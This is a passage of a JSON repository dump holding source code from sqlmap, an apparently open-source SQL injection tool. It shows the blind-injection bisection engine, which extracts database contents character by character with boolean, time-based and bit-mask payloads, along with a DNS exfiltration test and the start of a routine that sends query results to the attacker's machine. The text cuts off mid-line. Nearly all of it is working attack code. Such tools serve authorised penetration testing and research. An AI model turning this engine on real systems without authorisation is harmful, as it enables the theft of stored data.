    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport re\nimport time\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import calculateDeltaSeconds\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import decodeDbmsHexValue\nfrom lib.core.common import decodeIntToUnicode\nfrom lib.core.common import filterControlChars\nfrom lib.core.common import getCharset\nfrom lib.core.common import getCounter\nfrom lib.core.common import getPartRun\nfrom lib.core.common import getTechnique\nfrom lib.core.common import getTechniqueData\nfrom lib.core.common import goGoodSamaritan\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import incrementCounter\nfrom lib.core.common import isListLike\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import ADJUST_TIME_DELAY\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapThreadException\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.core.settings import CHAR_INFERENCE_MARK\nfrom lib.core.settings import INFERENCE_BLANK_BREAK\nfrom lib.core.settings import INFERENCE_EQUALS_CHAR\nfrom lib.core.settings import INFERENCE_GREATER_CHAR\nfrom lib.core.settings import INFERENCE_MARKER\nfrom lib.core.settings import INFERENCE_NOT_EQUALS_CHAR\nfrom lib.core.settings import INFERENCE_UNKNOWN_CHAR\nfrom lib.core.settings import MAX_BISECTION_LENGTH\nfrom lib.core.settings import MAX_REVALIDATION_STEPS\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PARTIAL_HEX_VALUE_MARKER\nfrom lib.core.settings import PARTIAL_VALUE_MARKER\nfrom lib.core.settings import PAYLOAD_DELIMITER\nfrom lib.core.settings import RANDOM_INTEGER_MARKER\nfrom lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.threads import runThreads\nfrom lib.core.unescaper import unescaper\nfrom lib.request.connect import Connect as Request\nfrom lib.utils.progress import ProgressBar\nfrom lib.utils.safe2bin import safecharencode\nfrom lib.utils.xrange import xrange\n\ndef bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):\n    \"\"\"\n    Bisection algorithm that can be used to perform blind SQL injection\n    on an affected host\n    \"\"\"\n\n    abortedFlag = False\n    showEta = False\n    partialValue = u\"\"\n    finalValue = None\n    retrievedLength = 0\n\n    if payload is None:\n        return 0, None\n\n    if charsetType is None and conf.charset:\n        asciiTbl = sorted(set(ord(_) for _ in conf.charset))\n    else:\n        asciiTbl = getCharset(charsetType)\n\n    threadData = getCurrentThreadData()\n    timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))\n    retVal = hashDBRetrieve(expression, checkConf=True)\n\n    if retVal:\n        if conf.repair and INFERENCE_UNKNOWN_CHAR in retVal:\n            pass\n        elif PARTIAL_HEX_VALUE_MARKER in retVal:\n            retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, \"\")\n\n            if retVal and conf.hexConvert:\n                partialValue = retVal\n                infoMsg = \"resuming partial value: %s\" % safecharencode(partialValue)\n                logger.info(infoMsg)\n        elif PARTIAL_VALUE_MARKER in retVal:\n            retVal = retVal.replace(PARTIAL_VALUE_MARKER, \"\")\n\n            if retVal and not conf.hexConvert:\n                partialValue = retVal\n                infoMsg = \"resuming partial value: %s\" % safecharencode(partialValue)\n                logger.info(infoMsg)\n        else:\n            infoMsg = \"resumed: %s\" % safecharencode(retVal)\n            logger.info(infoMsg)\n\n            return 0, retVal\n\n    if Backend.isDbms(DBMS.MCKOI):\n        match = re.search(r\"\\ASELECT\\b(.+)\\bFROM\\b(.+)\\Z\", expression, re.I)\n        if match:\n            original = queries[Backend.getIdentifiedDbms()].inference.query\n            right = original.split('<')[1]\n            payload = payload.replace(right, \"(SELECT %s FROM %s)\" % (right, match.group(2).strip()))\n            expression = match.group(1).strip()\n\n    elif Backend.isDbms(DBMS.FRONTBASE):\n        match = re.search(r\"\\ASELECT\\b(\\s+TOP\\s*\\([^)]+\\)\\s+)?(.+)\\bFROM\\b(.+)\\Z\", expression, re.I)\n        if match:\n            payload = payload.replace(INFERENCE_GREATER_CHAR, \" FROM %s)%s\" % (match.group(3).strip(), INFERENCE_GREATER_CHAR))\n            payload = payload.replace(\"SUBSTRING\", \"(SELECT%sSUBSTRING\" % (match.group(1) if match.group(1) else \" \"), 1)\n            expression = match.group(2).strip()\n\n    try:\n        # Set kb.partRun in case \"common prediction\" feature (a.k.a. \"good samaritan\") is used or the engine is called from the API\n        if conf.predictOutput:\n            kb.partRun = getPartRun()\n        elif conf.api:\n            kb.partRun = getPartRun(alias=False)\n        else:\n            kb.partRun = None\n\n        if partialValue:\n            firstChar = len(partialValue)\n        elif re.search(r\"(?i)(\\b|CHAR_)(LENGTH|LEN|COUNT)\\(\", expression):\n            firstChar = 0\n        elif conf.firstChar is not None and (isinstance(conf.firstChar, int) or (hasattr(conf.firstChar, \"isdigit\") and conf.firstChar.isdigit())):\n            firstChar = int(conf.firstChar) - 1\n            if kb.fileReadMode:\n                firstChar <<= 1\n        elif hasattr(firstChar, \"isdigit\") and firstChar.isdigit() or isinstance(firstChar, int):\n            firstChar = int(firstChar) - 1\n        else:\n            firstChar = 0\n\n        if re.search(r\"(?i)(\\b|CHAR_)(LENGTH|LEN|COUNT)\\(\", expression):\n            lastChar = 0\n        elif conf.lastChar is not None and (isinstance(conf.lastChar, int) or (hasattr(conf.lastChar, \"isdigit\") and conf.lastChar.isdigit())):\n            lastChar = int(conf.lastChar)\n        elif hasattr(lastChar, \"isdigit\") and lastChar.isdigit() or isinstance(lastChar, int):\n            lastChar = int(lastChar)\n        else:\n            lastChar = 0\n\n        if Backend.getDbms():\n            _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)\n            nulledCastedField = agent.nullAndCastField(fieldToCastStr)\n            expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)\n            expressionUnescaped = unescaper.escape(expressionReplaced)\n        else:\n            expressionUnescaped = unescaper.escape(expression)\n\n        if hasattr(length, \"isdigit\") and length.isdigit() or isinstance(length, int):\n            length = int(length)\n        else:\n            length = None\n\n        if length == 0:\n            return 0, \"\"\n\n        if length and (lastChar > 0 or firstChar > 0):\n            length = min(length, lastChar or length) - firstChar\n\n        if length and length > MAX_BISECTION_LENGTH:\n            length = None\n\n        showEta = conf.eta and isinstance(length, int)\n\n        if kb.bruteMode:\n            numThreads = 1\n        else:\n            numThreads = min(conf.threads or 0, length or 0) or 1\n\n        if showEta:\n            progress = ProgressBar(maxValue=length)\n\n        if numThreads > 1:\n            if not timeBasedCompare or kb.forceThreads:\n                debugMsg = \"starting %d thread%s\" % (numThreads, (\"s\" if numThreads > 1 else \"\"))\n                logger.debug(debugMsg)\n            else:\n                numThreads = 1\n\n        if conf.threads == 1 and not any((timeBasedCompare, conf.predictOutput)):\n            warnMsg = \"running in a single-thread mode. Please consider \"\n            warnMsg += \"usage of option '--threads' for faster data retrieval\"\n            singleTimeWarnMessage(warnMsg)\n\n        if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)):\n            if isinstance(length, int) and numThreads > 1:\n                dataToStdout(\"[%s] [INFO] retrieved: %s\" % (time.strftime(\"%X\"), \"_\" * min(length, conf.progressWidth)))\n                dataToStdout(\"\\r[%s] [INFO] retrieved: \" % time.strftime(\"%X\"))\n            else:\n                dataToStdout(\"\\r[%s] [INFO] retrieved: \" % time.strftime(\"%X\"))\n\n        def tryHint(idx):\n            with kb.locks.hint:\n                hintValue = kb.hintValue\n\n            if payload is not None and len(hintValue or \"\") > 0 and len(hintValue) >= idx:\n                if \"'%s'\" % CHAR_INFERENCE_MARK in payload:\n                    posValue = hintValue[idx - 1]\n                else:\n                    posValue = ord(hintValue[idx - 1])\n\n                markingValue = \"'%s'\" % CHAR_INFERENCE_MARK\n                unescapedCharValue = unescaper.escape(\"'%s'\" % decodeIntToUnicode(posValue))\n                forgedPayload = agent.extractPayload(payload) or \"\"\n                forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)).replace(markingValue, unescapedCharValue)\n                result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False)\n                incrementCounter(getTechnique())\n\n                if result:\n                    return hintValue[idx - 1]\n\n            with kb.locks.hint:\n                kb.hintValue = \"\"\n\n            return None\n\n        def validateChar(idx, value):\n            \"\"\"\n            Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay\n            \"\"\"\n\n            validationPayload = re.sub(r\"(%s.*?)%s(.*?%s)\" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r\"\\g<1>%s\\g<2>\" % INFERENCE_NOT_EQUALS_CHAR, payload)\n\n            if \"'%s'\" % CHAR_INFERENCE_MARK not in payload:\n                forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx, value))\n            else:\n                # e.g.: ... > '%c' -> ... > ORD(..)\n                markingValue = \"'%s'\" % CHAR_INFERENCE_MARK\n                unescapedCharValue = unescaper.escape(\"'%s'\" % decodeIntToUnicode(value))\n                forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)\n\n            result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)\n\n            if result and timeBasedCompare and getTechniqueData().trueCode:\n                result = threadData.lastCode == getTechniqueData().trueCode\n                if not result:\n                    warnMsg = \"detected HTTP code '%s' in validation phase is differing from expected '%s'\" % (threadData.lastCode, getTechniqueData().trueCode)\n                    singleTimeWarnMessage(warnMsg)\n\n            incrementCounter(getTechnique())\n\n            return result\n\n        def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None):\n            \"\"\"\n            continuousOrder means that distance between each two neighbour's\n            numerical values is exactly 1\n            \"\"\"\n\n            result = tryHint(idx)\n\n            if result:\n                return result\n\n            if charTbl is None:\n                charTbl = type(asciiTbl)(asciiTbl)\n\n            originalTbl = type(charTbl)(charTbl)\n\n            if kb.disableShiftTable:\n                shiftTable = None\n            elif continuousOrder and shiftTable is None:\n                # Used for gradual expanding into unicode charspace\n                shiftTable = [2, 2, 3, 3, 3]\n\n            if \"'%s'\" % CHAR_INFERENCE_MARK in payload:\n                for char in ('\\n', '\\r'):\n                    if ord(char) in charTbl:\n                        charTbl.remove(ord(char))\n\n            if not charTbl:\n                return None\n\n            elif len(charTbl) == 1:\n                forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0]))\n                result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)\n                incrementCounter(getTechnique())\n\n                if result:\n                    return decodeIntToUnicode(charTbl[0])\n                else:\n                    return None\n\n            maxChar = maxValue = charTbl[-1]\n            minValue = charTbl[0]\n            firstCheck = False\n            lastCheck = False\n            unexpectedCode = False\n\n            if continuousOrder:\n                while len(charTbl) > 1:\n                    position = None\n\n                    if charsetType is None:\n                        if not firstCheck:\n                            try:\n                                try:\n                                    lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]\n                                except IndexError:\n                                    lastChar = None\n                                else:\n                                    if 'a' <= lastChar <= 'z':\n                                        position = charTbl.index(ord('a') - 1)  # 96\n                                    elif 'A' <= lastChar <= 'Z':\n                                        position = charTbl.index(ord('A') - 1)  # 64\n                                    elif '0' <= lastChar <= '9':\n                                        position = charTbl.index(ord('0') - 1)  # 47\n                            except ValueError:\n                                pass\n                            finally:\n                                firstCheck = True\n\n                        elif not lastCheck and numThreads == 1:  # not usable in multi-threading environment\n                            if charTbl[(len(charTbl) >> 1)] < ord(' '):\n                                try:\n                                    # favorize last char check if current value inclines toward 0\n                                    position = charTbl.index(1)\n                                except ValueError:\n                                    pass\n                                finally:\n                                    lastCheck = True\n\n                    if position is None:\n                        position = (len(charTbl) >> 1)\n\n                    posValue = charTbl[position]\n                    falsePayload = None\n\n                    if \"'%s'\" % CHAR_INFERENCE_MARK not in payload:\n                        forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))\n                        falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER))\n                    else:\n                        # e.g.: ... > '%c' -> ... > ORD(..)\n                        markingValue = \"'%s'\" % CHAR_INFERENCE_MARK\n                        unescapedCharValue = unescaper.escape(\"'%s'\" % decodeIntToUnicode(posValue))\n                        forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)\n                        falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL)\n\n                    if timeBasedCompare:\n                        if kb.responseTimeMode:\n                            kb.responseTimePayload = falsePayload\n                        else:\n                            kb.responseTimePayload = None\n\n                    result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)\n\n                    incrementCounter(getTechnique())\n\n                    if not timeBasedCompare and getTechniqueData() is not None:\n                        unexpectedCode |= threadData.lastCode not in (getTechniqueData().falseCode, getTechniqueData().trueCode)\n                        if unexpectedCode:\n                            if threadData.lastCode is not None:\n                                warnMsg = \"unexpected HTTP code '%s' detected.\" % threadData.lastCode\n                            else:\n                                warnMsg = \"unexpected response detected.\"\n\n                            warnMsg += \" Will use (extra) validation step in similar cases\"\n\n                            singleTimeWarnMessage(warnMsg)\n\n                    if result:\n                        minValue = posValue\n\n                        if not isinstance(charTbl, xrange):\n                            charTbl = charTbl[position:]\n                        else:\n                            # xrange() - extended virtual charset used for memory/space optimization\n                            charTbl = xrange(charTbl[position], charTbl[-1] + 1)\n                    else:\n                        maxValue = posValue\n\n                        if not isinstance(charTbl, xrange):\n                            charTbl = charTbl[:position]\n                        else:\n                            charTbl = xrange(charTbl[0], charTbl[position])\n\n                    if len(charTbl) == 1:\n                        if maxValue == 1:\n                            return None\n\n                        # Going beyond the original charset\n                        elif minValue == maxChar:\n                            # If the original charTbl was [0,..,127] new one\n                            # will be [128,..,(128 << 4) - 1] or from 128 to 2047\n                            # and instead of making a HUGE list with all the\n                            # elements we use a xrange, which is a virtual\n                            # list\n                            if expand and shiftTable:\n                                charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop())\n                                originalTbl = xrange(charTbl)\n                                maxChar = maxValue = charTbl[-1]\n                                minValue = charTbl[0]\n                            else:\n                                kb.disableShiftTable = True\n                                return None\n                        else:\n                            retVal = minValue + 1\n\n                            if retVal in originalTbl or (retVal == ord('\\n') and CHAR_INFERENCE_MARK in payload):\n                                if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal):\n                                    if not kb.originalTimeDelay:\n                                        kb.originalTimeDelay = conf.timeSec\n\n                                    threadData.validationRun = 0\n                                    if (retried or 0) < MAX_REVALIDATION_STEPS:\n                                        errMsg = \"invalid character detected. retrying..\"\n                                        logger.error(errMsg)\n\n                                        if timeBasedCompare:\n                                            if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:\n                                                conf.timeSec += 1\n                                                warnMsg = \"increasing time delay to %d second%s\" % (conf.timeSec, 's' if conf.timeSec > 1 else '')\n                                                logger.warning(warnMsg)\n\n                                            if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:\n                                                dbgMsg = \"turning off time auto-adjustment mechanism\"\n                                                logger.debug(dbgMsg)\n                                                kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO\n\n                                        return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1)\n                                    else:\n                                        errMsg = \"unable to properly validate last character value ('%s')..\" % decodeIntToUnicode(retVal)\n                                        logger.error(errMsg)\n                                        conf.timeSec = kb.originalTimeDelay\n                                        return decodeIntToUnicode(retVal)\n                                else:\n                                    if timeBasedCompare:\n                                        threadData.validationRun += 1\n                                        if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD:\n                                            dbgMsg = \"turning back on time auto-adjustment mechanism\"\n                                            logger.debug(dbgMsg)\n                                            kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES\n\n                                    return decodeIntToUnicode(retVal)\n                            else:\n                                return None\n            else:\n                if \"'%s'\" % CHAR_INFERENCE_MARK in payload and conf.charset:\n                    errMsg = \"option '--charset' is not supported on '%s'\" % Backend.getIdentifiedDbms()\n                    raise SqlmapUnsupportedFeatureException(errMsg)\n\n                candidates = list(originalTbl)\n                bit = 0\n                while len(candidates) > 1:\n                    bits = {}\n                    for candidate in candidates:\n                        bit = 0\n                        while candidate:\n                            bits.setdefault(bit, 0)\n                            bits[bit] += 1 if candidate & 1 else -1\n                            candidate >>= 1\n                            bit += 1\n\n                    choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0]\n                    mask = 1 << choice\n\n                    forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, \"&%d%s\" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0))\n                    result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)\n                    incrementCounter(getTechnique())\n\n                    if result:\n                        candidates = [_ for _ in candidates if _ & mask > 0]\n                    else:\n                        candidates = [_ for _ in candidates if _ & mask == 0]\n\n                    bit += 1\n\n                if candidates:\n                    forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0]))\n                    result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)\n                    incrementCounter(getTechnique())\n\n                    if result:\n                        return decodeIntToUnicode(candidates[0])\n\n        # Go multi-threading (--threads > 1)\n        if numThreads > 1 and isinstance(length, int) and length > 1:\n            threadData.shared.value = [None] * length\n            threadData.shared.index = [firstChar]    # As list for python nested function scoping\n            threadData.shared.start = firstChar\n\n            try:\n                def blindThread():\n                    threadData = getCurrentThreadData()\n\n                    while kb.threadContinue:\n                        with kb.locks.index:\n                            if threadData.shared.index[0] - firstChar >= length:\n                                return\n\n                            threadData.shared.index[0] += 1\n                            currentCharIndex = threadData.shared.index[0]\n\n                        if kb.threadContinue:\n                            val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset))\n                            if val is None:\n                                val = INFERENCE_UNKNOWN_CHAR\n                        else:\n                            break\n\n                        # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4629\n                        if not isListLike(threadData.shared.value):\n                            break\n\n                        with kb.locks.value:\n                            threadData.shared.value[currentCharIndex - 1 - firstChar] = val\n                            currentValue = list(threadData.shared.value)\n\n                        if kb.threadContinue:\n                            if showEta:\n                                progress.progress(threadData.shared.index[0])\n                            elif conf.verbose >= 1:\n                                startCharIndex = 0\n                                endCharIndex = 0\n\n                                for i in xrange(length):\n                                    if currentValue[i] is not None:\n                                        endCharIndex = max(endCharIndex, i)\n\n                                output = ''\n\n                                if endCharIndex > conf.progressWidth:\n                                    startCharIndex = endCharIndex - conf.progressWidth\n\n                                count = threadData.shared.start\n\n                                for i in xrange(startCharIndex, endCharIndex + 1):\n                                    output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ')\n\n                                for i in xrange(length):\n                                    count += 1 if currentValue[i] is not None else 0\n\n                                if startCharIndex > 0:\n                                    output = \"..\" + output[2:]\n\n                                if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1):\n                                    output = output[:-2] + \"..\"\n\n                                if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)):\n                                    _ = count - firstChar\n                                    output += '_' * (min(length, conf.progressWidth) - len(output))\n                                    status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length))\n                                    output += status if _ != length else \" \" * len(status)\n\n                                    dataToStdout(\"\\r[%s] [INFO] retrieved: %s\" % (time.strftime(\"%X\"), output))\n\n                runThreads(numThreads, blindThread, startThreadMsg=False)\n\n            except KeyboardInterrupt:\n                abortedFlag = True\n\n            finally:\n                value = [_ for _ in partialValue]\n                value.extend(_ for _ in threadData.shared.value)\n\n            infoMsg = None\n\n            # If we have got one single character not correctly fetched it\n            # can mean that the connection to the target URL was lost\n            if None in value:\n                partialValue = \"\".join(value[:value.index(None)])\n\n                if partialValue:\n                    infoMsg = \"\\r[%s] [INFO] partially retrieved: %s\" % (time.strftime(\"%X\"), filterControlChars(partialValue))\n            else:\n                finalValue = \"\".join(value)\n                infoMsg = \"\\r[%s] [INFO] retrieved: %s\" % (time.strftime(\"%X\"), filterControlChars(finalValue))\n\n            if conf.verbose in (1, 2) and infoMsg and not any((showEta, conf.api, kb.bruteMode)):\n                dataToStdout(infoMsg)\n\n        # No multi-threading (--threads = 1)\n        else:\n            index = firstChar\n            threadData.shared.value = \"\"\n\n            while True:\n                index += 1\n\n                # Common prediction feature (a.k.a. \"good samaritan\")\n                # NOTE: to be used only when multi-threading is not set for\n                # the moment\n                if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None:\n                    val = None\n                    commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl)\n\n                    # If there is one single output in common-outputs, check\n                    # it via equal against the query output\n                    if commonValue is not None:\n                        # One-shot query containing equals commonValue\n                        testValue = unescaper.escape(\"'%s'\" % commonValue) if \"'\" not in commonValue else unescaper.escape(\"%s\" % commonValue, quote=False)\n\n                        query = getTechniqueData().vector\n                        query = agent.prefixQuery(query.replace(INFERENCE_MARKER, \"(%s)%s%s\" % (expressionUnescaped, INFERENCE_EQUALS_CHAR, testValue)))\n                        query = agent.suffixQuery(query)\n\n                        result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)\n                        incrementCounter(getTechnique())\n\n                        # Did we have luck?\n                        if result:\n                            if showEta:\n                                progress.progress(len(commonValue))\n                            elif conf.verbose in (1, 2) or conf.api:\n                                dataToStdout(filterControlChars(commonValue[index - 1:]))\n\n                            finalValue = commonValue\n                            break\n\n                    # If there is a common pattern starting with partialValue,\n                    # check it via equal against the substring-query output\n                    if commonPattern is not None:\n                        # Substring-query containing equals commonPattern\n                        subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))\n                        testValue = unescaper.escape(\"'%s'\" % commonPattern) if \"'\" not in commonPattern else unescaper.escape(\"%s\" % commonPattern, quote=False)\n\n                        query = getTechniqueData().vector\n                        query = agent.prefixQuery(query.replace(INFERENCE_MARKER, \"(%s)=%s\" % (subquery, testValue)))\n                        query = agent.suffixQuery(query)\n\n                        result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)\n                        incrementCounter(getTechnique())\n\n                        # Did we have luck?\n                        if result:\n                            val = commonPattern[index - 1:]\n                            index += len(val) - 1\n\n                    # Otherwise if there is no commonValue (single match from\n                    # txt/common-outputs.txt) and no commonPattern\n                    # (common pattern) use the returned common charset only\n                    # to retrieve the query output\n                    if not val and commonCharset:\n                        val = getChar(index, commonCharset, False)\n\n                    # If we had no luck with commonValue and common charset,\n                    # use the returned other charset\n                    if not val:\n                        val = getChar(index, otherCharset, otherCharset == asciiTbl)\n                else:\n                    val = getChar(index, asciiTbl, not(charsetType is None and conf.charset))\n\n                if val is None:\n                    finalValue = partialValue\n                    break\n\n                if kb.data.processChar:\n                    val = kb.data.processChar(val)\n\n                threadData.shared.value = partialValue = partialValue + val\n\n                if showEta:\n                    progress.progress(index)\n                elif (conf.verbose in (1, 2) and not kb.bruteMode) or conf.api:\n                    dataToStdout(filterControlChars(val))\n\n                # Note: some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces\n                if Backend.getIdentifiedDbms() in (DBMS.FIREBIRD, DBMS.DB2, DBMS.MAXDB, DBMS.DERBY, DBMS.FRONTBASE) and len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace():\n                    finalValue = partialValue[:-INFERENCE_BLANK_BREAK]\n                    break\n                elif charsetType and partialValue[-1:].isspace():\n                    finalValue = partialValue[:-1]\n                    break\n\n                if (lastChar > 0 and index >= lastChar):\n                    finalValue = \"\" if length == 0 else partialValue\n                    finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue\n                    partialValue = None\n                    break\n\n    except KeyboardInterrupt:\n        abortedFlag = True\n    finally:\n        kb.prependFlag = False\n        retrievedLength = len(finalValue or \"\")\n\n        if finalValue is not None:\n            finalValue = decodeDbmsHexValue(finalValue) if conf.hexConvert else finalValue\n            hashDBWrite(expression, finalValue)\n        elif partialValue:\n            hashDBWrite(expression, \"%s%s\" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue))\n\n    if conf.hexConvert and not any((abortedFlag, conf.api, kb.bruteMode)):\n        infoMsg = \"\\r[%s] [INFO] retrieved: %s  %s\\n\" % (time.strftime(\"%X\"), filterControlChars(finalValue), \" \" * retrievedLength)\n        dataToStdout(infoMsg)\n    else:\n        if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)):\n            dataToStdout(\"\\n\")\n\n        if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3:\n            infoMsg = \"retrieved: %s\" % filterControlChars(finalValue)\n            logger.info(infoMsg)\n\n    if kb.threadException:\n        raise SqlmapThreadException(\"something unexpected happened inside the threads\")\n\n    if abortedFlag:\n        raise KeyboardInterrupt\n\n    _ = finalValue or partialValue\n\n    return getCounter(getTechnique()), safecharencode(_) if kb.safeCharEncode else _\n\ndef queryOutputLength(expression, payload):\n    \"\"\"\n    Returns the query output length.\n    \"\"\"\n\n    infoMsg = \"retrieving the length of query output\"\n    logger.info(infoMsg)\n\n    start = time.time()\n\n    lengthExprUnescaped = agent.forgeQueryOutputLength(expression)\n    count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS)\n\n    debugMsg = \"performed %d quer%s in %.2f seconds\" % (count, 'y' if count == 1 else \"ies\", calculateDeltaSeconds(start))\n    logger.debug(debugMsg)\n\n    if length == \" \":\n        length = 0\n\n    return length\n"
  },
  {
    "path": "sqlmap/lib/techniques/dns/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/techniques/dns/test.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import randomInt\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.exception import SqlmapNotVulnerableException\nfrom lib.techniques.dns.use import dnsUse\n\ndef dnsTest(payload):\n    logger.info(\"testing for data retrieval through DNS channel\")\n\n    randInt = randomInt()\n    kb.dnsTest = dnsUse(payload, \"SELECT %d%s\" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), \"\"))) == str(randInt)\n\n    if not kb.dnsTest:\n        errMsg = \"data retrieval through DNS channel failed\"\n        if not conf.forceDns:\n            conf.dnsDomain = None\n            errMsg += \". Turning off DNS exfiltration support\"\n            logger.error(errMsg)\n        else:\n            raise SqlmapNotVulnerableException(errMsg)\n    else:\n        infoMsg = \"data retrieval through DNS channel was successful\"\n        logger.info(infoMsg)\n"
  },
  {
    "path": "sqlmap/lib/techniques/dns/use.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\nimport time\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import calculateDeltaSeconds\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import decodeDbmsHexValue\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import DNS_BOUNDARIES_ALPHABET\nfrom lib.core.settings import MAX_DNS_LABEL\nfrom lib.core.settings import PARTIAL_VALUE_MARKER\nfrom lib.core.unescaper import unescaper\nfrom lib.request.connect import Connect as Request\nfrom lib.utils.safe2bin import safecharencode\n\ndef dnsUse(payload, expression):\n    \"\"\"\n    Retrieve the output of a SQL query taking advantage of the DNS\n    resolution mechanism by making request back to attacker's machine.\n    \"\"\"\n\n    start = time.time()\n\n    retVal = None\n    count = 0\n    offset = 1\n\n    if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):\n        output = 